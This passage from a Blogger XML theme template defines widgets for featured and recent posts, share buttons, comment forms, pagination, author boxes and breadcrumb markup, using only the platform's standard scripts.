              <b:widget-setting name='showSnippet'>true</b:widget-setting>
              <b:widget-setting name='showPostTitle'>true</b:widget-setting>
              <b:widget-setting name='postId'>0</b:widget-setting>
              <b:widget-setting name='showFirstImage'>true</b:widget-setting>
              <b:widget-setting name='useMostRecentPost'>true</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <div class='widget-content'>
        <b:if cond='data:widget.sectionId == &quot;featured-section&quot;'>
            <b:loop values='data:posts' var='post'>
          <b:include data='post' name='featpostContent'/>
        </b:loop>
          <b:else/>
        <b:loop values='data:posts' var='post'>
          <b:include data='post' name='postContent'/>
        </b:loop>
        </b:if>
      </div>
    </b:includable>
            <b:includable id='blogThisShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=270,width=475\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='bylineByName' var='byline'>
  <b:switch var='data:byline.name'>
  <b:case value='share'/>
    <b:include cond='data:post.shareUrl' name='postShareButtons'/>
  <b:case value='comments'/>
    <b:include cond='data:post.allowComments' name='postCommentsLink'/>
  <b:case value='location'/>
    <b:include cond='data:post.location' name='postLocation'/>
  <b:case value='timestamp'/>
    <b:include cond='not data:view.isPage' name='postTimestamp'/>
  <b:case value='author'/>
    <b:include name='postAuthor'/>
  <b:case value='labels'/>
    <b:include cond='data:post.labels' name='postLabels'/>
  <b:case value='icons'/>
    <b:include cond='data:post.emailPostUrl' name='emailPostIcon'/>
  </b:switch>
</b:includable>
            <b:includable id='bylineRegion' var='regionItems'>
  <b:loop values='data:regionItems' var='byline'>
    <b:include data='byline' name='bylineByName'/>
  </b:loop>
</b:includable>
            <b:includable id='commentsLink'>
  <a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
    <b:if cond='data:post.numberOfComments &gt; 0'>
      <b:message name='messages.numberOfComments'>
        <b:param expr:value='data:post.numberOfComments' name='numComments'/>
      </b:message>
    <b:else/>
      <data:messages.postAComment/>
    </b:if>
  </a>
</b:includable>
            <b:includable id='commentsLinkIframe'>
  <!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
            <b:includable id='emailPostIcon'>
  <span class='byline post-icons'>
    <!-- email post links -->
    <span class='item-action'>
      <a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'>
        <b:include data='{ iconClass: &quot;touch-icon sharing-icon&quot; }' name='emailIcon'/>
      </a>
    </span>
  </span>
</b:includable>
            <b:includable id='facebookShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=430,width=640\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='featpostContent' var='post'>
       <div class='post'>
        <div class='post-content'>

          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
            <span class='post-tag'><data:post.labels.last.name/></span>
          </a>

          <div class='post-info'>

            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <p class='post-snippet'><b:eval expr='data:post.snippets.long snippet { length: 150 }'/></p>
                    
                <b:include data='post' name='postJumpLink'/>
          </div>
        </div>
      </div>
    </b:includable>
            <b:includable id='footerBylines'>
  <b:if cond='data:widgets.Blog.first.footerBylines'>
    <b:loop index='i' values='data:widgets.Blog.first.footerBylines' var='region'>
      <b:if cond='not data:region.items.empty'>
        <div expr:class='&quot;post-footer-line post-footer-line-&quot; + (data:i + 1)'>
          <b:with value='&quot;footer-&quot; + (data:i + 1)' var='regionName'>
            <b:include data='region.items' name='bylineRegion'/>
          </b:with>
        </div>
      </b:if>
    </b:loop>
  </b:if>
</b:includable>
            <b:includable id='googlePlusShare'>
  <b:comment>Google+ sharing removed because the service is discontinued.</b:comment>
</b:includable>
            <b:includable id='headerByline'>
  <b:if cond='data:widgets.Blog.first.headerByline'>
    <div class='post-header'>
      <div class='post-header-line-1'>
        <b:with value='&quot;header-1&quot;' var='regionName'>
          <b:include data='data:widgets.Blog.first.headerByline.items' name='bylineRegion'/>
        </b:with>
      </div>
    </div>
  </b:if>
</b:includable>
            <b:includable id='linkShare'>
  <b:with value='&quot;window.prompt(\&quot;Copy to clipboard: Ctrl+C, Enter\&quot;, \&quot;&quot; + data:originalUrl + &quot;\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='otherSharingButton'>
  <span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'>
    <b:with value='{key: &quot;sharingOther&quot;}' var='platform'>
      <b:include name='sharingPlatformIcon'/>
    </b:with>
    <span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span>
  </span>
</b:includable>
            <b:includable id='platformShare'>
  <a expr:class='&quot;goog-inline-block sharing-&quot; + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:onclick='data:onclick ? data:onclick : &quot;&quot;' expr:title='data:platform.shareMessage' target='_blank'>
    <span class='share-button-link-text'>
      <data:platform.shareMessage/>
    </span>
  </a>
</b:includable>
            <b:includable id='postAuthor'>
  <span class='byline post-author vcard'>
    <span class='post-author-label'>
      <data:byline.label/>
    </span>
    <span class='fn'>
      <b:if cond='data:post.author.profileUrl'>
        <meta expr:content='data:post.author.profileUrl'/>
        <a class='g-profile' expr:href='data:post.author.profileUrl' rel='author' title='author profile'>
          <span><data:post.author.name/></span>
        </a>
      <b:else/>
        <span><data:post.author.name/></span>
      </b:if>
    </span>
  </span>
</b:includable>
            <b:includable id='postCommentsLink'>
  <span class='byline post-comment-link container'>
    <b:include cond='data:post.commentSource != 1' name='commentsLink'/>
  </span>
</b:includable>
            <b:includable id='postContent' var='post'>
      <div class='post'>
        <div class='post-content'>
 
          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
            <span class='post-tag'><data:post.labels.last.name/></span>
          </a>

          <div class='post-info'>
            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <div class='post-meta'>
              <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
            </div>
          </div>
        </div>
      </div>
    </b:includable>
            <b:includable id='postJumpLink' var='post'>
  <div class='jump-link flat-button'>
    <a expr:href='data:post.url fragment &quot;more&quot;' expr:title='data:post.title'>
      <b:eval expr='data:blog.jumpLinkMessage'/>
    </a>
  </div>
</b:includable>
            <b:includable id='postLabels'>
  <span class='byline post-labels'>
    <span class='byline-label'><data:byline.label/></span>
    <b:loop index='i' values='data:post.labels' var='label'>
      <a expr:href='data:label.url' rel='tag'>
        <data:label.name/>
      </a>
    </b:loop>
  </span>
</b:includable>
            <b:includable id='postLocation'>
  <span class='byline post-location'>
    <data:byline.label/>
    <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
  </span>
</b:includable>
            <b:includable id='postReactions'>
  <!-- Reaction feature no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
            <b:includable id='postShareButtons'>
  <div class='byline post-share-buttons goog-inline-block'>
    <b:with value='data:sharingId ?: ((data:widget.instanceId ?: &quot;sharing&quot;) + &quot;-&quot; + (data:regionName ?: &quot;byline&quot;) + &quot;-&quot; + data:post.id)' var='sharingId'>
      <!-- Note: 'sharingButtons' includable is from the default Sharing widget markup. -->
      <b:include data='{                                                sharingId: data:sharingId,                                                originalUrl: data:post.url,                                                platforms: data:this.sharing.platforms,                                                shareUrl: data:post.shareUrl,                                                shareTitle: data:post.title,                                              }' name='sharingButtons'/>
    </b:with>
  </div>
</b:includable>
            <b:includable id='postTimestamp'>
  <span class='byline post-timestamp'>
    <data:byline.label/>
    <b:if cond='data:post.url'>
      <meta expr:content='data:post.url.canonical'/>
      <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'>
        <time class='published' expr:datetime='data:post.date.iso8601' expr:title='data:post.date.iso8601'>
          <data:post.date/>
        </time>
      </a>
    </b:if>
  </span>
</b:includable>
            <b:includable id='sharingButton'>
  <span expr:aria-label='data:platform.shareMessage' expr:class='&quot;sharing-platform-button sharing-element-&quot; + data:platform.key' expr:data-href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'>
    <b:include name='sharingPlatformIcon'/>
    <span class='platform-sharing-text'><data:platform.name/></span>
  </span>
</b:includable>
            <b:includable id='sharingButtonContent'>
  <div class='flat-icon-button ripple'>
    <b:include name='shareIcon'/>
  </div>
</b:includable>
            <b:includable id='sharingButtons'>
  <div class='sharing' expr:aria-owns='&quot;sharing-popup-&quot; + data:sharingId' expr:data-title='data:shareTitle'>
    <button class='sharing-button touch-icon-button' expr:aria-controls='&quot;sharing-popup-&quot; + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-button-&quot; + data:sharingId' role='button'>
      <b:include name='sharingButtonContent'/>
    </button>
    <b:include name='sharingButtonsMenu'/>
  </div>
</b:includable>
            <b:includable id='sharingButtonsMenu'>
  <div class='share-buttons-container'>
    <ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-popup-&quot; + data:sharingId' role='menu'>
      <b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p =&gt; p.key not in {&quot;blogThis&quot;})' var='platform'>
        <li>
          <b:include name='sharingButton'/>
        </li>
      </b:loop>
      <li aria-hidden='true' class='hidden'>
        <b:include name='otherSharingButton'/>
      </li>
    </ul>
  </div>
</b:includable>
            <b:includable id='sharingPlatformIcon'>
  <b:include data='{ iconClass: (&quot;touch-icon sharing-&quot; + data:platform.key) }' expr:name='data:platform.key + &quot;Icon&quot;'/>
</b:includable>
            <b:includable id='snippetedPostByline'>
  <b:with value='(data:widgets first (w =&gt; w.type == &quot;Blog&quot;)).allBylineItems' var='blogBylines'>
    <div class='item-byline'>
      <b:with value='data:blogBylines first (i =&gt; i.name == &quot;author&quot;)' var='byline'>
        <b:include cond='data:byline and data:this.postDisplay.showAuthor' data='post' name='postAuthor'/>
      </b:with>
      <b:with value='data:blogBylines first (i =&gt; i.name == &quot;timestamp&quot;)' var='byline'>
        <b:include cond='data:byline and data:this.postDisplay.showDate' data='post' name='postTimestamp'/>
      </b:with>
    </div>
  </b:with>
</b:includable>
            <b:includable id='snippetedPostContent'>
  <div class='post-content'>
    <b:include cond='data:this.postDisplay.showTitle' name='snippetedPostTitle'/>
    <b:include cond='data:this.postDisplay.showDate or data:this.postDisplay.showAuthor' name='snippetedPostByline'/>
    <b:include cond='data:this.postDisplay.showSnippet' data='post' name='postSnippet'/>
    <b:include cond='data:this.postDisplay.showFeaturedImage and data:post.featuredImage' name='snippetedPostThumbnail'/>
  </div>
</b:includable>
            <b:includable id='snippetedPostThumbnail'>
  <div class='item-thumbnail'>
    <a expr:href='data:post.url'>
      <b:include data='{                         image: data:post.featuredImage,                         imageSizes: [72, 144],                         imageRatio: &quot;1:1&quot;,                         sourceSizes: &quot;72px&quot;                        }' name='responsiveImage'/>
    </a>
  </div>
</b:includable>
            <b:includable id='snippetedPostTitle'>
  <b:if cond='data:post.title != &quot;&quot;'>
    <h3 class='post-title'><a expr:href='data:post.url'><data:post.title/></a></h3>
  </b:if>
</b:includable>
            <b:includable id='snippetedPosts'>
  <div role='feed'>
    <!-- Don't render the post that we're currently already looking at. -->
    <b:loop values='data:posts filter (p =&gt; p.id != data:view.postId)' var='post'>
      <article class='post' role='article'>
        <b:include name='snippetedPostContent'/>
      </article>
    </b:loop>
  </div>
</b:includable>
          </b:widget>
        </b:section>
    </div>
  </div>
 <div class='clearfix'/>
                      </b:if>
    
  </div>
  
  
<div id='combo-down'> 
<b:if cond='data:view.isHomepage'>  
<div class='fold-shadow-right'/> 
</b:if>
<div class='com-mix'>
  
  <!-- Content Wrapper -->
  <div class='row' id='content-wrapper'>
    <div class='container'>

      <!-- Main Wrapper -->
      <div id='main-wrapper'>
        <b:section class='main' id='main' maxwidgets='1' name='Main Posts' showaddelement='yes'>
          <b:widget id='Blog1' locked='true' title='Postagens no blog' type='Blog' version='2' visible='true'>
            <b:widget-settings>
              <b:widget-setting name='commentLabel'>Comments</b:widget-setting>
              <b:widget-setting name='showShareButtons'>true</b:widget-setting>
              <b:widget-setting name='authorLabel'>by</b:widget-setting>
              <b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting>
              <b:widget-setting name='timestampLabel'/>
              <b:widget-setting name='reactionsLabel'/>
              <b:widget-setting name='showAuthorProfile'>true</b:widget-setting>
              <b:widget-setting name='style.layout'>1x1</b:widget-setting>
              <b:widget-setting name='showLocation'>false</b:widget-setting>
              <b:widget-setting name='showTimestamp'>true</b:widget-setting>
              <b:widget-setting name='postsPerAd'>1</b:widget-setting>
              <b:widget-setting name='style.bordercolor'>#ffffff</b:widget-setting>
              <b:widget-setting name='backlinksLabel'/>
              <b:widget-setting name='showDateHeader'>false</b:widget-setting>
              <b:widget-setting name='style.textcolor'>#ffffff</b:widget-setting>
              <b:widget-setting name='showCommentLink'>true</b:widget-setting>
              <b:widget-setting name='style.urlcolor'>#ffffff</b:widget-setting>
              <b:widget-setting name='postLocationLabel'/>
              <b:widget-setting name='showAuthor'>true</b:widget-setting>
              <b:widget-setting name='style.linkcolor'>#ffffff</b:widget-setting>
              <b:widget-setting name='style.bgcolor'>#ffffff</b:widget-setting>
              <b:widget-setting name='showLabels'>true</b:widget-setting>
              <b:widget-setting name='postLabelsLabel'>Tags</b:widget-setting>
              <b:widget-setting name='showBacklinks'>false</b:widget-setting>
              <b:widget-setting name='showInlineAds'>false</b:widget-setting>
              <b:widget-setting name='showReactions'>false</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main' var='this'>
              <b:include name='searchMessage'/>
              <div class='blog-posts hfeed container'>
                <b:class cond='data:view.isMultipleItems' name='index-post-wrap'/>
                <b:class cond='data:view.isSingleItem' name='item-post-wrap'/>
                <b:if cond='data:view.isHomepage'>
                  <h3 class='home-title'><span><data:messages.recentPosts/></span></h3>
                </b:if>
                <b:tag class='grid-posts' cond='data:view.isMultipleItems' name='div'>
                  <b:loop index='i' values='data:posts' var='post'>
                    <b:include data='post' name='postCommentsAndAd'/>
                  </b:loop>
                </b:tag>
              </div>
              <b:include cond='data:view.isMultipleItems' name='indexBlogPager'/>
              <b:include name='feedLinks'/>
            </b:includable>
            <b:includable id='aboutPostAuthor'>
              <div class='about-author'>
                <div class='avatar-container'>
                  <b:if cond='data:post.author.authorPhoto.image'>
                    <img class='author-avatar' expr:alt='data:post.author.name' expr:src='data:post.author.authorPhoto.image resizeImage 100'/>                
                    <b:else/>
                    <img class='author-avatar' expr:alt='data:post.author.name' src='https://4.bp.blogspot.com/-uCjYgVFIh70/VuOLn-mL7PI/AAAAAAAADUs/Kcu9wJbv790hIo83rI_s7lLW3zkLY01EA/s100/avatar.png'/>
                  </b:if>
                </div>
                <h3 class='author-name'>
                  <span><data:messages.postedBy/></span><a expr:alt='data:post.author.name' expr:href='data:post.author.profileUrl' target='_blank'> <data:post.author.name/></a>
                </h3>
                <span class='author-description'><data:post.author.aboutMe/></span>
              </div>
            </b:includable>
            <b:includable id='addComments'>
              <a expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
                <b:message name='messages.postAComment'/>
              </a>
            </b:includable>
            <b:includable id='backLinks' var='post'>
              <b:comment>Disabled</b:comment>         
            </b:includable>
            <b:includable id='blogThisShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=270,width=475\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='bylineByName' var='byline'>
  <b:switch var='data:byline.name'>
  <b:case value='share'/>
    <b:include cond='data:post.shareUrl' name='postShareButtons'/>
  <b:case value='comments'/>
    <b:include cond='data:post.allowComments' name='postCommentsLink'/>
  <b:case value='location'/>
    <b:include cond='data:post.location' name='postLocation'/>
  <b:case value='timestamp'/>
    <b:include cond='not data:view.isPage' name='postTimestamp'/>
  <b:case value='author'/>
    <b:include name='postAuthor'/>
  <b:case value='labels'/>
    <b:include cond='data:post.labels' name='postLabels'/>
  <b:case value='icons'/>
    <b:include cond='data:post.emailPostUrl' name='emailPostIcon'/>
  </b:switch>
</b:includable>
            <b:includable id='bylineRegion' var='regionItems'>
  <b:loop values='data:regionItems' var='byline'>
    <b:include data='byline' name='bylineByName'/>
  </b:loop>
</b:includable>
            <b:includable id='commentAuthorAvatar'>
              <div class='avatar-image-container'>
                <img class='author-avatar' expr:src='data:comment.authorAvatarSrc' height='45' width='45'/>
              </div>
            </b:includable>
            <b:includable id='commentDeleteIcon' var='comment'>
              <span expr:class='&quot;item-control &quot; + data:comment.adminClass'>
                <b:if cond='data:showCmtPopup'>
                  <div class='goog-toggle-button'>
                    <div class='goog-inline-block comment-action-icon'/>
                  </div>
                  <b:else/>
                  <a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:messages.deleteComment'>
                    <img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
                  </a>
                </b:if>
              </span>
            </b:includable>
            <b:includable id='commentForm' var='post'>
              <div class='comment-form'>
                <a name='comment-form'/>
                <b:if cond='data:this.messages.blogComment != &quot;&quot;'>
                  <p><data:this.messages.blogComment/></p>
                </b:if>
                <b:include data='post' name='commentFormIframeSrc'/>
                <iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: &quot;90px&quot;' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
                <data:post.cmtfpIframe/>
                <script type='text/javascript'>
                  BLOG_CMT_createIframe(&#39;<data:post.appRpcRelayPath/>&#39;);
                </script>
              </div>
            </b:includable>
            <b:includable id='commentFormIframeSrc' var='post'>
              <a expr:href='data:post.commentFormIframeSrc + &quot;&amp;skin=contempo&quot;' id='comment-editor-src'/>
            </b:includable>
            <b:includable id='commentItem' var='comment'>
              <div class='comment' expr:id='&quot;c&quot; + data:comment.id'>
                <b:include cond='data:blog.enabledCommentProfileImages' name='commentAuthorAvatar'/>

                <div class='comment-block'>
                  <div class='comment-author'>
                    <b:if cond='data:comment.authorUrl'>
                      <b:message name='messages.authorSaidWithLink'>
                        <b:param expr:value='data:comment.author' name='authorName'/>
                        <b:param expr:value='data:comment.authorUrl' name='authorUrl'/>
                      </b:message>
                      <b:else/>
                      <b:message name='messages.authorSaid'>
                        <b:param expr:value='data:comment.author' name='authorName'/>
                      </b:message>
                    </b:if>
                  </div>
                  <div expr:class='&quot;comment-body&quot; + (data:comment.isDeleted ? &quot; deleted&quot; : &quot;&quot;)'>
                    <data:comment.body/>
                  </div>
                  <div class='comment-footer'>
                    <span class='comment-timestamp'>
                      <a expr:href='data:comment.url' title='comment permalink'>
                        <data:comment.timestamp/>
                      </a>
                      <b:include data='comment' name='commentDeleteIcon'/>
                    </span>
                  </div>
                </div>
              </div>
            </b:includable>
            <b:includable id='commentList' var='comments'>
              <div id='comments-block'>
                <b:loop values='data:comments' var='comment'>
                  <b:include data='comment' name='commentItem'/>
                </b:loop>
              </div>
            </b:includable>
            <b:includable id='commentPicker' var='post'>
              <b:if cond='data:post.allowComments'>
                <div class='title-wrap comments-title'>
                  <h3><data:messages.postAComment/></h3>
                </div>
              </b:if>
              <b:if cond='data:post.commentSource == 1'>
                <b:include data='post' name='iframeComments'/>
                <b:elseif cond='data:post.showThreadedComments'/>
                <b:include data='post' name='threadedComments'/>
                <b:else/>
                <b:include data='post' name='comments'/>
              </b:if>
            </b:includable>
            <b:includable id='comments' var='post'>
              <section expr:class='&quot;comments&quot; + (data:post.embedCommentForm ? &quot; embed&quot; : &quot;&quot;)' expr:data-num-comments='data:post.numberOfComments' id='comments'>
                <a name='comments'/>
                <b:if cond='data:post.allowComments'>

                  <b:include name='commentsTitle'/>

                  <div expr:id='data:widget.instanceId + &quot;_comments-block-wrapper&quot;'>
                    <b:include cond='data:post.comments' data='post.comments' name='commentList'/>
                  </div>

                  <b:if cond='data:post.commentPagingRequired'>
                    <div class='paging-control-container'>
                      <b:if cond='data:post.hasOlderLinks'>
                        <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>
                          <data:messages.oldest/>
                        </a>
                        <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>
                          <data:messages.older/>
                        </a>
                      </b:if>

                      <span class='comment-range-text'>
                        <data:post.commentRangeText/>
                      </span>

                      <b:if cond='data:post.hasNewerLinks'>
                        <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>
                          <data:messages.newer/>
                        </a>
                        <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>
                          <data:messages.newest/>
                        </a>
                      </b:if>
                    </div>
                  </b:if>

                  <div class='footer'>
                    <b:if cond='data:post.embedCommentForm'>
                      <b:if cond='data:post.allowNewComments'>
                        <b:include data='post' name='commentForm'/>
                        <b:else/>
                        <data:post.noNewCommentsText/>
                      </b:if>
                      <b:else/>
                      <b:if cond='data:post.allowComments'>
                        <b:include data='post' name='addComments'/>
                      </b:if>
                    </b:if>
                  </div>
                </b:if>
                <b:if cond='data:showCmtPopup'>
                  <div id='comment-popup'>
                    <iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
                    </iframe>
                  </div>
                </b:if>
              </section>
            </b:includable>
            <b:includable id='commentsLink'>
  <a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
    <b:if cond='data:post.numberOfComments &gt; 0'>
      <b:message name='messages.numberOfComments'>
        <b:param expr:value='data:post.numberOfComments' name='numComments'/>
      </b:message>
    <b:else/>
      <data:messages.postAComment/>
    </b:if>
  </a>
</b:includable>
            <b:includable id='commentsLinkIframe'>
  <!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
            <b:includable id='commentsTitle'>
              <!-- Post Commments Title -->
              <h3 class='title'><data:post.numberOfComments/> <data:messages.comments/></h3>
            </b:includable>
            <b:includable id='defaultAdUnit'>
  <ins class='adsbygoogle' data-ad-format='auto' expr:data-ad-client='data:adClientId ?: data:blog.adsenseClientId' expr:data-ad-host='data:blog.adsenseHostId' expr:data-analytics-uacct='data:blog.analyticsAccountNumber' expr:style='data:style ?: &quot;display: block;&quot;'/>
  <script>
   (adsbygoogle = window.adsbygoogle || []).push({});
  </script>
</b:includable>
            <b:includable id='emailPostIcon'>
  <span class='byline post-icons'>
    <!-- email post links -->
    <span class='item-action'>
      <a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'>
        <b:include data='{ iconClass: &quot;touch-icon sharing-icon&quot; }' name='emailIcon'/>
      </a>
    </span>
  </span>
</b:includable>
            <b:includable id='facebookShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=430,width=640\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='feedLinks'>
              <b:comment>Disabled</b:comment> 
            </b:includable>
            <b:includable id='feedLinksBody' var='links'>
              <b:comment>Disabled</b:comment> 
            </b:includable>
            <b:includable id='footerBylines' var='post'>
              <!-- Post Footer Extras -->
              <b:include data='post' name='postLabels'/>
              <b:include data='post' name='postReactions'/>
              <b:include data='post' name='postShareButtons'/>
            </b:includable>
            <b:includable id='googlePlusShare'>
  <b:comment>Google+ sharing removed because the service is discontinued.</b:comment>
</b:includable>
            <b:includable id='headerByline' var='post'>
              <!-- Post Header Meta -->
                <div class='post-meta'>
                  <b:include data='post' name='postAuthor'/>
                  <b:include data='post' name='postTimestamp'/>
                </div>
            </b:includable>
            <b:includable id='homePageLink'>
              <b:comment>Disabled</b:comment> 
            </b:includable>
            <b:includable id='iframeComments' var='post'>
              <b:if cond='data:post.allowIframeComments'>
                <script expr:src='data:post.iframeCommentSrc' type='text/javascript'/>
                <div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/>
                <b:if cond='!data:post.embedCommentForm'>
                  <b:include data='post' name='commentsLink'/>
                </b:if>
              </b:if>
            </b:includable>
            <b:includable id='indexBlogPager'>
              <!-- Post Pagination Index -->
              <div class='blog-pager container' id='blog-pager'>
                <b:if cond='data:olderPageUrl'>
                  <a class='blog-pager-older-link load-more' expr:data-load='data:olderPageUrl' href='javascript:;' id='load-more-link'><b:include data='{ message: &quot;loadMorePosts&quot; }' name='translate'/></a>
                  <span class='loading'><span class='loader'/></span>
                  <span class='no-more load-more'><b:include data='{ message: &quot;noMorePosts&quot; }' name='translate'/></span>
                  <b:else/>
                  <span class='no-more load-more show'><b:include data='{ message: &quot;noMorePosts&quot; }' name='translate'/></span>
                </b:if>
              </div>
            </b:includable>
            <b:includable id='indexPost' var='post'>
              <div id='combo'>
              <!-- Index Post Content -->
              <b:include data='post' name='postFeaturedImage'/>
              <div class='post-info'>
                <b:include data='post' name='postHeader'/>  
                <b:include data='post' name='postSummary'/>
                <b:include data='post' name='postJumpLink'/>
              </div>
              </div>
            </b:includable>
            <b:includable id='inlineAd' var='post'>
              <b:comment>Disabled</b:comment> 
            </b:includable>
            <b:includable id='itemPost' var='post'>
              <!-- Item Post Content -->
              <b:include data='post' name='postHeader'/>
              <b:include data='post' name='postBody'/>
              <b:include cond='data:view.isPost' data='post' name='postFooter'/>
            </b:includable>
            <b:includable id='linkShare'>
  <b:with value='&quot;window.prompt(\&quot;Copy to clipboard: Ctrl+C, Enter\&quot;, \&quot;&quot; + data:originalUrl + &quot;\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='manageComments'>
  <a expr:href='data:post.manageCommentsUrl' expr:onclick='data:post.manageCommentsUrlOnclick'>
    <b:message name='messages.manageComments'/>
  </a>
</b:includable>
            <b:includable id='nextPageLink'>
              <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;' expr:title='data:messages.olderPosts'>
                <data:messages.olderPosts/>
              </a>
            </b:includable>
            <b:includable id='otherSharingButton'>
  <span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'>
    <b:with value='{key: &quot;sharingOther&quot;}' var='platform'>
      <b:include name='sharingPlatformIcon'/>
    </b:with>
    <span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span>
  </span>
</b:includable>
            <b:includable id='platformShare'>
  <a expr:class='&quot;goog-inline-block sharing-&quot; + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:onclick='data:onclick ? data:onclick : &quot;&quot;' expr:title='data:platform.shareMessage' target='_blank'>
    <span class='share-button-link-text'>
      <data:platform.shareMessage/>
    </span>
  </a>
</b:includable>
            <b:includable id='post' var='post'>
              <!-- Post Index -->
              <b:if cond='data:view.isMultipleItems'>
                <b:include data='post' name='indexPost'/>
              </b:if>
              <!-- Post Item -->
              <b:if cond='data:view.isSingleItem'>
                <b:include data='post' name='itemPost'/>
              </b:if>
            </b:includable>
            <b:includable id='postAuthor' var='post'>
              <!-- Post Author -->
              <b:if cond='data:allBylineItems.author'>
                <span class='post-author'><a expr:href='data:post.author.profileUrl' expr:title='data:post.author.name' target='_blank'><data:post.author.name/></a></span>
              </b:if>
            </b:includable>
            <b:includable id='postBody' var='post'> 
              <!-- Post Body Entry Content-->
              <div class='post-body post-content'>
                <data:post.body/>
              </div>
            </b:includable>
            <b:includable id='postBodySnippet' var='post'>
              <b:include data='post' name='postBody'/>
            </b:includable>
            <b:includable id='postBreadcrumbs' var='post'>
              <!-- Post Breadcrumbs -->
              <nav id='breadcrumb'><a expr:href='data:blog.homepageUrl'><data:messages.home/></a><b:if cond='data:post.labels'><em class='delimiter'/><a class='b-label' expr:href='data:post.labels.last.url'><data:post.labels.last.name/></a></b:if><em class='delimiter'/><span class='current'><data:post.title/></span></nav>
              <script type='application/ld+json'>
              {
                &quot;@context&quot;: &quot;https://schema.org&quot;,
                &quot;@type&quot;: &quot;BreadcrumbList&quot;,
                &quot;@id&quot;: &quot;#Breadcrumb&quot;,
                &quot;itemListElement&quot;: [{
                  &quot;@type&quot;: &quot;ListItem&quot;,
                  &quot;position&quot;: 1,
                  &quot;item&quot;: {
                    &quot;name&quot;: &quot;<data:messages.home/>&quot;,
                    &quot;@id&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>&quot;
                  }
                },{
